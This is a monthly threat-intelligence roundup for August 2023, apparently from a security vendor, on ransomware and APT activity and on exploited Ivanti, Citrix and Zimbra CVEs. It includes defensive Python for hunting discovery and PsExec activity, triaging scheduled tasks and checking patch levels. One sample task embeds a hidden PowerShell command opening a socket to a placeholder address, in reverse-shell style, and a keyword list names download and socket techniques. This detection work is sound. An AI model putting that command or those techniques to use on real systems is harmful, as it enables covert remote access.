August 2023: Key Threat Actors, Malware and Exploited Vulnerabilities

Welcome to Picus Security's monthly cyber threat intelligence roundup! 

Each month, we aim to provide a comprehensive yet digestible analysis of the evolving threat landscape, including which sectors, industries, and regions cybercriminals are targeting most heavily in the wild.

Our research is conducted throughout the entire month, utilizing a diverse range of resources that span across threat intelligence and malware dump platforms, blogs, exploit databases, sandboxes, and network data query results. We draw upon this wealth of information to provide you with a holistic understanding of the cyber threat environment, with a particular focus on dissecting malware campaigns, attack campaigns conducted by threat actors and advanced persistent threat (APT) groups, and new malware samples observed in the wild.

By following our monthly threat report, you'll be able to ascertain which threat actors or malware could potentially impact your sector, gauge if your country is being specifically targeted, and understand if there is a surge in threat activity correlated with geopolitical events or state-backed actions. 

Executive Summary

  • August 2023 saw a substantial increase in cyber threats. The most active threat actors were Lazarus APT ([1], [2]), the Cuba ransomware gang [3], the Akira ransomware gang [4], MoustachedBouncer [5], and the NoEscape ransomware group ([6], [7], [8]).

  • All of these actors caused significant disruption to businesses and critical infrastructure. For instance, the Akira ransomware gang claimed the theft of 85 GB of data from the Belt Railway Company of Chicago [4], and the NoEscape ransomware group encrypted a mail server of the German Federal Bar Association [6].

  • In terms of malware, August 2023 saw continued use of the BUGHATCH and BURNTCIGAR tools by the Cuba ransomware gang [3], and of the newly documented Disco and NightClub malware families by MoustachedBouncer [5]. These campaigns primarily targeted North America, Latin America, and Eastern Europe.

  • Additionally, Lazarus APT deployed QuiteRAT and CollectionRAT ([1], [2]), showing that the group continues to develop new tools and to modify existing ones.

  • August also saw exploitation of several vulnerabilities. CVE-2021-33764 was exploited by operators of the Spacecolon toolset and Scarab ransomware [9], while CVE-2022-27926 was targeted by a phishing campaign against Zimbra users [14] and by the MoustachedBouncer cyber-espionage group [5]. CVE-2023-35078, CVE-2023-3519, and CVE-2023-3467 were exploited by several APT groups ([10], [11]) and by 8Base ransomware [12].

Top Five Most Active Threat Actors in August 2023

The surge in cyber threats in August 2023 is alarming.

1. Lazarus APT: The Most Notorious Cyber Threat Actor of August 2023

In August, the Lazarus APT group, a North Korean state-sponsored actor, remained highly active, targeting internet backbone infrastructure and healthcare entities in Europe and the United States [1]. 

Lazarus exploited a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) to deploy a new implant, QuiteRAT, only five days after proof-of-concept exploits were published [2]. QuiteRAT has capabilities similar to the group's better-known MagicRAT but is much smaller on disk; like MagicRAT it is built on the Qt framework, which adds complexity to the compiled code and makes human analysis harder. This campaign is the third in under a year in which Lazarus reused the same infrastructure. The focus on Europe and the U.S. and the use of a critical vulnerability (Kenna risk score of 100 out of 100) point to a deliberate, targeted approach. Although the malware arsenal has evolved with QuiteRAT, the group's method of entry (exploiting publicly known vulnerabilities in internet-facing software) and its targeting of critical infrastructure remain consistent, which is why this advanced persistent threat (APT) actor continues to warrant attention.

2. Cuba Ransomware: Lighting Up Networks with BURNTCIGAR and BUGHATCH

In August 2023, the Cuba ransomware gang was notably active, targeting critical infrastructure organizations in the U.S. and an IT integrator in Latin America [3].

Alongside its established tools, BURNTCIGAR, which abuses a signed driver to terminate security processes at kernel level, and BUGHATCH, a custom downloader and backdoor, the gang began exploiting CVE-2023-27532 in Veeam Backup & Replication while continuing to exploit CVE-2020-1472 (Zerologon, the Netlogon privilege escalation). This update to its tactics, techniques, and procedures (TTPs) aims to speed up execution, impede detection and analysis, and maximize impact. The group persistently recycles network infrastructure and keeps a core set of TTPs, modifying them only subtly from one campaign to the next. It also operates a dark-web leak site listing alleged victims and stolen data, and its victim selection remains concentrated on Western (or allied), democratic, anglophone countries. Together with linguistic clues and the malware's avoidance of systems with a Russian language or keyboard layout, this points to a Russian-speaking origin for the operators.

3. Akira Ransomware Gang: Rails Held Ransom

In August 2023, the Akira ransomware group [4] targeted several high-profile entities, including the Belt Railway Company of Chicago, the largest switching and terminal railroad in the United States.

Akira claimed on its leak site to have stolen 85 GB of data, despite the company's recent efforts to strengthen its security posture in line with new TSA directives. The incident prompted an investigation by federal law enforcement and an outside cybersecurity firm; the company maintained that its operations were unaffected. The attack underscores the threat posed by Akira, which emerged in March 2023 and has since compromised organizations across many sectors worldwide, from local governments and educational institutions to financial services and music divisions. The targeting of critical infrastructure such as railroads demonstrates the group's capacity and intent to disrupt key services, against a backdrop of escalating cyberthreats from nation-states such as Russia and a broader surge in attacks on railway operators globally.

4. MoustachedBouncer: Disco Daze - The NightClub Malware Targeting Diplomats in Belarus

In August 2023, ESET documented the MoustachedBouncer threat group, which targets foreign diplomats in Belarus [5]. The group has exploited CVE-2022-27926 as an initial access vector and deploys a malware suite with two main components, Disco and NightClub.

Disco delivers the initial payload and establishes a foothold (including persistence via scheduled tasks), while NightClub handles collection and data exfiltration over email-based command and control. MoustachedBouncer's activity reflects a well-coordinated, long-running intelligence-gathering effort with mature capabilities and clear strategic interests. The campaign shows an evolution in the group's tactics, techniques, and procedures (TTPs), with continued investment in operational security and detection evasion. Its focus on foreign diplomats in Belarus underscores high-value targeting and a geopolitical motive behind its espionage.

5. NoEscape Ransomware: An Escalating Global Threat to Multiple Sectors

In August 2023, the NoEscape ransomware group, also known as N0_Esc4pe, stepped up its attacks on key sectors worldwide [6].

One notable attack hit the German Federal Bar Association (BRAK), the umbrella organization for lawyers in Germany: the group encrypted a mail server and claimed to have exfiltrated 160 GB of data, causing significant disruption [6]. This followed a series of earlier incidents in which the group extracted a ransom payment from Hawaiʻi Community College ([7], [8]) and hit a Belgian hospital, a US manufacturer, and a Dutch manufacturer [6]. NoEscape's ransomware is written in C++ and, unusually, is not derived from leaked or stolen source code of earlier families. The August activity shows the group's growing capability and the widening range of sectors it threatens, underscoring the need for stronger defenses and vigilance across all industries.

Most Active Malware in August 2023

Here are the most actively used malware families in August 2023.

  • BUGHATCH Malware: Cuba Ransomware's Latest Threat to the US and Latin America

In August 2023, the Cuba ransomware gang (a.k.a. COLDDRAW or Fidel ransomware) deployed new tools and malware against the critical infrastructure sector in North America and a large IT integrator in Latin America [3].

The group used BUGHATCH together with a range of other tools, including Cobalt Strike Beacon, netpingall.exe, and built-in utilities such as ping.exe, cmd.exe, net.exe, and PsExec, for network discovery, lateral movement, privilege escalation, and command-and-control (C2) communications. A notable development was the group's first observed exploitation of CVE-2023-27532 in Veeam Backup & Replication, in addition to the previously exploited CVE-2020-1472 (Zerologon). The group again recycled network infrastructure and subtly modified its TTPs, adopting readily available components to upgrade its toolset. This evolution, combined with the choice of targets, underscores the group's adaptability and persistence.
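The discovery and lateral-movement chain attributed to Cuba here and in the section above (net.exe enumeration, ping sweeps, PsExec) is visible in ordinary process-creation telemetry such as Sysmon Event ID 1 or EDR process logs. The following Python is an added example written for this page, not code from Picus or from the BlackBerry report: it runs a few detection rules over constructed process-creation events (the hostnames, timestamps and command lines are invented for illustration) and reports, per host, the enumeration commands, ping sweeps and PsExec activity it finds.

```python
"""Hunt for the discovery / lateral-movement chain (net.exe enumeration,
ping sweeps, PsExec) in process-creation telemetry such as Sysmon Event ID 1."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str      # endpoint that logged the event
    ts: int        # event time, epoch seconds
    parent: str    # parent image file name
    image: str     # image file name
    cmdline: str   # full command line


NET_VERBS = {"user", "group", "localgroup", "view", "share"}   # enumeration verbs
PING_WINDOW = 300      # seconds
PING_SWEEP_MIN = 5     # distinct targets pinged inside the window


def net_discovery(ev):
    """net.exe / net1.exe used for account, group or host enumeration."""
    if ev.image.lower() not in ("net.exe", "net1.exe"):
        return None
    args = ev.cmdline.lower().split()
    if len(args) > 1 and args[1] in NET_VERBS:
        scope = "domain" if "/domain" in args else "local"
        return f"net-discovery:{scope}:{args[1]}"
    return None


def ping_target(ev):
    """Return the host argument of a ping.exe invocation, else None."""
    if ev.image.lower() != "ping.exe":
        return None
    parts = ev.cmdline.split()
    return parts[-1] if len(parts) > 1 else None


def psexec_activity(ev):
    """Both ends of PsExec: the client on the source host, PSEXESVC on the target."""
    img, parent = ev.image.lower(), ev.parent.lower()
    if img == "psexesvc.exe" and parent == "services.exe":
        return "psexec-service-started"            # this host is the target
    if parent == "psexesvc.exe":
        return f"psexec-remote-exec:{img}"         # command run through the service
    if img.startswith("psexec") and "\\\\" in ev.cmdline:
        return "psexec-client"                     # this host is the source
    return None


def hunt(events):
    """Return {host: [findings]} for hosts showing any of the behaviours."""
    findings = defaultdict(list)
    pings = defaultdict(list)                      # host -> [(ts, target)]
    for ev in sorted(events, key=lambda e: e.ts):
        for tag in (net_discovery(ev), psexec_activity(ev)):
            if tag:
                findings[ev.host].append(tag)
        target = ping_target(ev)
        if target:
            pings[ev.host].append((ev.ts, target))
    for host, series in pings.items():             # sliding window over time-sorted pings
        for i, (t0, _) in enumerate(series):
            targets = {tgt for t, tgt in series[i:] if t - t0 <= PING_WINDOW}
            if len(targets) >= PING_SWEEP_MIN:
                findings[host].append(f"ping-sweep:{len(targets)}-targets")
                break
    return dict(findings)


SAMPLE_EVENTS = [  # constructed telemetry for the example, not real logs
    ProcEvent("ws01", 1000, "cmd.exe", "net.exe", 'net group "domain admins" /domain'),
    ProcEvent("ws01", 1005, "cmd.exe", "net.exe", "net user /domain"),
    ProcEvent("ws01", 1010, "cmd.exe", "net.exe", "net use"),              # no enumeration verb
    *[ProcEvent("ws01", 1100 + i, "cmd.exe", "ping.exe", f"ping -n 1 10.0.0.{i}") for i in range(1, 8)],
    ProcEvent("ws01", 1300, "cmd.exe", "psexec.exe", "psexec.exe \\\\srv02 -s cmd.exe /c whoami"),
    ProcEvent("srv02", 1301, "services.exe", "psexesvc.exe", "C:\\Windows\\PSEXESVC.exe"),
    ProcEvent("srv02", 1302, "psexesvc.exe", "cmd.exe", "cmd.exe /c whoami"),
    ProcEvent("ws03", 2000, "explorer.exe", "ping.exe", "ping -n 1 fileserver"),  # one ping: noise
]

if __name__ == "__main__":
    for host, tags in hunt(SAMPLE_EVENTS).items():
        print(host, tags)
```

The PsExec rule keys on PSEXESVC.exe being started by services.exe on the target and on children of that service, which is what stock PsExec leaves behind; an operator who renames the remote service with PsExec's -r switch evades the name match, so pair this with the source-side rule and with Event ID 7045 (service installation) logging on servers.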

  • Introducing Disco and NightClub: The Latest Malware Additions to MoustachedBouncer's Arsenal

In August 2023, the cyber-espionage group MoustachedBouncer was notably active, employing two malware families, Disco and NightClub, in targeted attacks [5].

Disco acts as a dropper that delivers the initial payload and creates scheduled tasks which function as reverse shells, whereas NightClub is a fully modular C++ implant used for espionage that communicates with its command-and-control (C&C) servers over email; additional spying capabilities can be added to NightClub by delivering modules through the same email channel. The group's targets are foreign embassies and diplomats in Belarus [5]. Its operations combine newly developed tools, network-level adversary-in-the-middle interception of victims' web traffic, and existing malware frameworks, indicating substantial technical expertise and resources and a continued threat to governments and organizations with a presence in the region.
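Disco's persistence through scheduled tasks that act as reverse shells is something you can look for directly in exported task definitions (schtasks /query /tn <name> /xml, or the XML files under C:\Windows\System32\Tasks). The following Python is an added example, not ESET's or Picus's code: it parses Task Scheduler XML, scores each task on shell launchers, network-oriented arguments, the hidden flag, elevated run level, logon/boot triggers and short repetition intervals, and ranks a batch. The two task definitions embedded below are constructed for the example; 198.51.100.7 is a documentation address, not an indicator from the report.

```python
"""Triage exported Scheduled Task XML for shell-launching persistence."""
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SHELL_LAUNCHERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                   "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
NETWORK_HINTS = ("tcpclient", "net.sockets", "downloadstring", "invoke-webrequest",
                 "http://", "https://", "frombase64string", "-enc ", "-e ")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")


def triage_task(xml_doc):
    """Return {'uri', 'command', 'reasons'} for one task definition.
    xml_doc may be str or bytes. Exports are UTF-16 with an XML declaration,
    so pass the raw bytes (open(path, 'rb').read()) and let the parser decode."""
    root = ET.fromstring(xml_doc)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="(unnamed)", namespaces=TASK_NS)
    reasons, commands = [], []
    for ex in root.findall("t:Actions/t:Exec", TASK_NS):
        cmd = (ex.findtext("t:Command", default="", namespaces=TASK_NS) or "").strip()
        args = (ex.findtext("t:Arguments", default="", namespaces=TASK_NS) or "").strip()
        commands.append((cmd + " " + args).strip())
        base = cmd.replace("/", "\\").split("\\")[-1].lower().strip('"')
        if base in SHELL_LAUNCHERS:
            reasons.append("shell-launcher:" + base)
        if any(h in args.lower() for h in NETWORK_HINTS):
            reasons.append("network-args")
        if any(p in (cmd + " " + args).lower() for p in USER_WRITABLE):
            reasons.append("user-writable-path")
    if root.findtext("t:Settings/t:Hidden", default="false", namespaces=TASK_NS).lower() == "true":
        reasons.append("hidden")
    if root.findtext("t:Principals/t:Principal/t:RunLevel", default="", namespaces=TASK_NS) == "HighestAvailable":
        reasons.append("runlevel-highest")
    for trig in ("LogonTrigger", "BootTrigger"):          # fire without user interaction
        if root.find(f"t:Triggers/t:{trig}", TASK_NS) is not None:
            reasons.append(trig.lower())
    for iv in root.findall(".//t:Repetition/t:Interval", TASK_NS):   # beacon-like cadence
        reasons.append("repeats-every:" + (iv.text or "?"))
    return {"uri": uri, "command": " ; ".join(commands), "reasons": reasons}


def triage_all(docs):
    """Rank a batch of task definitions, most suspicious first."""
    return sorted((triage_task(d) for d in docs), key=lambda r: len(r["reasons"]), reverse=True)


# Constructed sample: a reverse-shell style task masquerading as an update check.
SUSPICIOUS_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Microsoft\\Windows\\UpdateCheck</URI></RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
    <TimeTrigger><Repetition><Interval>PT10M</Interval></Repetition>
      <StartBoundary>2023-08-01T09:00:00</StartBoundary><Enabled>true</Enabled></TimeTrigger>
  </Triggers>
  <Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec><Command>powershell.exe</Command>
      <Arguments>-nop -w hidden -c "$c=New-Object Net.Sockets.TcpClient('198.51.100.7',443)"</Arguments></Exec>
  </Actions>
</Task>"""

# Constructed sample: an ordinary vendor updater task.
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Vendor\\Updater</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2023-08-01T03:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author">
    <Exec><Command>C:\\Program Files\\Vendor\\updater.exe</Command><Arguments>/silent</Arguments></Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for row in triage_all([BENIGN_TASK, SUSPICIOUS_TASK]):
        print(len(row["reasons"]), row["uri"], row["reasons"])
```

Each reason is a weak signal on its own (plenty of legitimate tasks are hidden or run elevated); the value is in the combination, which is why the output is a ranked list to review rather than a verdict.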

  • Unmasking Lazarus APT: The Emergence of QuiteRAT and CollectionRAT

The Lazarus Group, a well-known North Korean state-sponsored APT, is actively updating its arsenal with two newly discovered remote access trojans (RATs), QuiteRAT and CollectionRAT ([1], [2]).

QuiteRAT is a more streamlined, easily deployable successor to the previously documented MagicRAT with similar functionality. CollectionRAT, which offers standard capabilities such as executing arbitrary commands and managing files on infected systems, appears to be linked to Jupiter/EarlyRAT, previously attributed to Andariel, a subgroup within Lazarus. The group is therefore not only developing new tools but also modifying and repurposing older ones to keep its attacks effective and stealthy. Its adoption of open-source tooling, such as the DeimosC2 framework and a trojanized build of PuTTY's Plink utility, further indicates a tactical shift intended to hinder analysis.

Top CVEs Exploited in August 2023

Here are the most targeted vulnerabilities in August 2023, with the affected product and the malware or threat actors observed exploiting each.

1. CVE-2021-33764
   Affected product: Microsoft Windows Server (various versions and configurations)
   Threat actors / malware campaigns: Spacecolon toolset and Scarab ransomware [9]

2. CVE-2022-27926
   Affected product: Zimbra Collaboration (ZCS) 9.0, reflected cross-site scripting [13]
   Threat actors / malware campaigns: mass phishing campaign targeting Zimbra Collaboration email servers [14]; MoustachedBouncer cyber-espionage group [5]

3. CVE-2023-35078
   Affected product: Ivanti Endpoint Manager Mobile (EPMM), all supported versions (11.8, 11.9, and 11.10 branches) prior to the vendor patch [15]
   Threat actors / malware campaigns: APT groups exploiting Ivanti EPMM vulnerabilities [10]; 8Base ransomware [12]

4. CVE-2023-3519
   Affected product: Citrix NetScaler ADC and NetScaler Gateway (unauthenticated remote code execution)
   Threat actors / malware campaigns: threat actors targeting customer-managed Citrix servers [11]; 8Base ransomware [12]

5. CVE-2023-3467
   Affected product: Citrix ADC and Citrix Gateway (privilege escalation to root)
   Threat actors / malware campaigns: 8Base ransomware [12]
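Checking whether an installed build is patched for the entries above is a branch-aware comparison, because each supported release branch received its own fix build and older branches received none. The Python below is an added example, not vendor or Picus code. The fixed-build numbers it carries (Ivanti EPMM 11.8.1.1, 11.9.1.1 and 11.10.0.2 for CVE-2023-35078; NetScaler 13.1-49.13 and 13.0-91.13 for CVE-2023-3519) are taken from the vendors' July 2023 advisories and should be verified against those advisories before the table is relied on; FIPS/NDcPP NetScaler builds have their own fix numbers and are not modelled. The inventory rows are constructed.

```python
"""Branch-aware patch check for the exploited CVEs listed above."""
import re

# Minimum fixed build per release branch. Figures from the vendor advisories
# (Ivanti for CVE-2023-35078, Citrix for CVE-2023-3519); re-verify before use.
FIXED_BUILDS = {
    "CVE-2023-35078": {
        "product": "Ivanti Endpoint Manager Mobile",
        "branches": {"11.8": "11.8.1.1", "11.9": "11.9.1.1", "11.10": "11.10.0.2"},
        "oldest_supported": "11.8",   # older branches never received a fix
    },
    "CVE-2023-3519": {
        "product": "Citrix NetScaler ADC / Gateway",
        "branches": {"13.1": "13.1-49.13", "13.0": "13.0-91.13"},
        "oldest_supported": "13.0",   # 12.1 (non-FIPS) is end-of-life; FIPS builds not modelled
    },
}


def parse_build(text):
    """'13.1-49.13' -> (13, 1, 49, 13); '11.10.0.2' -> (11, 10, 0, 2)."""
    return tuple(int(n) for n in re.findall(r"\d+", text))


def _padded(a, b):
    """Right-pad with zeros so 11.9.1 compares correctly against 11.9.1.1."""
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)), b + (0,) * (n - len(b))


def assess(cve, installed):
    """Return 'patched', 'vulnerable: ...' or 'unknown branch: ...' for one build."""
    entry = FIXED_BUILDS[cve]
    v = parse_build(installed)
    branch = ".".join(str(n) for n in v[:2])
    if branch not in entry["branches"]:
        if v < parse_build(entry["oldest_supported"]):
            return "vulnerable: unsupported branch, no fix available, upgrade"
        return "unknown branch: check the vendor advisory"
    fixed = entry["branches"][branch]
    v_p, f_p = _padded(v, parse_build(fixed))
    return "patched" if v_p >= f_p else f"vulnerable: needs {fixed} or later"


INVENTORY = [  # constructed sample rows: (asset, CVE, installed build)
    ("mdm01", "CVE-2023-35078", "11.8.1.0"),
    ("mdm02", "CVE-2023-35078", "11.10.0.2"),
    ("mdm03", "CVE-2023-35078", "11.7.2.1"),
    ("ns-gw1", "CVE-2023-3519", "13.1-48.47"),
    ("ns-gw2", "CVE-2023-3519", "13.0-91.13"),
]


def check_inventory(rows=INVENTORY):
    """Attach a verdict to every inventory row."""
    return [(asset, cve, build, assess(cve, build)) for asset, cve, build in rows]


if __name__ == "__main__":
    for asset, cve, build, verdict in check_inventory():
        print(f"{asset:8} {cve:15} {build:12} {verdict}")
```

The "unknown branch" outcome is deliberate: a build newer than anything in the table is not assumed safe, because a new branch may have shipped before the fix was folded in, and a silent "patched" for it would hide exactly the case the table cannot answer.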

The growing number of public-facing products under active exploitation underscores the importance of swift, comprehensive defensive measures. Patch management, threat detection, and a well-rehearsed incident response process are essential to withstand such relentless attacks.

Organizations must prioritize proactive security practices to protect their networks and data from the continually evolving tactics of threat actors.

References

[1] A. Malhotra, "Lazarus Group's infrastructure reuse leads to discovery of new malware," Cisco Talos Blog, Aug. 24, 2023. Available: https://blog.talosintelligence.com/lazarus-collectionrat/. [Accessed: Aug. 28, 2023]

[2] A. Malhotra, "Lazarus Group exploits ManageEngine vulnerability to deploy QuiteRAT," Cisco Talos Blog, Aug. 24, 2023. Available: https://blog.talosintelligence.com/lazarus-quiterat/. [Accessed: Aug. 28, 2023]

[3] "Cuba Ransomware Deploys New Tools: Targets Critical Infrastructure Sector in the U.S. and IT Integrator in Latin America," BlackBerry, Aug. 17, 2023. Available: https://blogs.blackberry.com/en/2023/08/cuba-ransomware-deploys-new-tools-targets-critical-infrastructure-sector-in-the-usa-and-it-integrator-in-latin-america. [Accessed: Aug. 28, 2023]

[4] "Largest switching and terminal railroad in US investigating ransomware data theft," The Record. Available: https://therecord.media/belt-railway-chicago-ransomware-data-theft-akira. [Accessed: Aug. 28, 2023]

[5] A. Goretsky, "MoustachedBouncer: Espionage against foreign diplomats in Belarus," ESET Research, WeLiveSecurity. Available: https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/. [Accessed: Aug. 28, 2023]

[6] "Germany's national bar association investigating ransomware attack," The Record. Available: https://therecord.media/german-national-bar-association-investigating-cyberattack. [Accessed: Aug. 28, 2023]

[7] "Hawaiʻi Community College pays ransom after attackers steal personal info of 28,000 people," The Record. Available: https://therecord.media/hawaii-community-college-pays-ransom-after-hack-compromises-data. [Accessed: Aug. 28, 2023]

[8] "Ransomware hackers paid in HCC case," West Hawaii Today, Aug. 10, 2023. Available: https://www.westhawaiitoday.com/2023/08/10/hawaii-news/ransomware-hackers-paid-in-hcc-case/. [Accessed: Aug. 28, 2023]

[9] J. Souček, "Scarabs colon-izing vulnerable servers," ESET Research, WeLiveSecurity. Available: https://www.welivesecurity.com/en/eset-research/scarabs-colon-izing-vulnerable-servers/. [Accessed: Aug. 28, 2023]

[10] "Threat Actors Exploiting Ivanti EPMM Vulnerabilities (AA23-213A)," Cybersecurity and Infrastructure Security Agency (CISA). Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-213a. [Accessed: Aug. 28, 2023]

[11] Unit 42, "Threat Brief: RCE Vulnerability CVE-2023-3519 on Customer-Managed Citrix Servers," Palo Alto Networks Unit 42, Jul. 28, 2023. Available: https://unit42.paloaltonetworks.com/threat-brief-citrix-cve-2023-3519/. [Accessed: Aug. 28, 2023]

[12] "8Base ransomware pulse," AlienVault Open Threat Exchange (OTX). Available: https://otx.alienvault.com/pulse/64c3b8a568674f257291b042. [Accessed: Aug. 28, 2023]

[13] "CVE-2022-27926," MITRE CVE. Available: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27926. [Accessed: Aug. 28, 2023]

[14] V. Šperka, "Mass-spreading campaign targeting Zimbra users," ESET Research, WeLiveSecurity. Available: https://www.welivesecurity.com/en/eset-research/mass-spreading-campaign-targeting-zimbra-users/. [Accessed: Aug. 28, 2023]

[15] D. Burton, "CVE-2023-35078: Critical API Access Vulnerability in Ivanti Endpoint Manager Mobile," Rapid7, Jul. 26, 2023. Available: https://www.rapid7.com/blog/post/2023/07/26/etr-cve-2023-35078-critical-api-access-vulnerability-ivanti-in-endpoint-manager-mobile/. [Accessed: Aug. 28, 2023]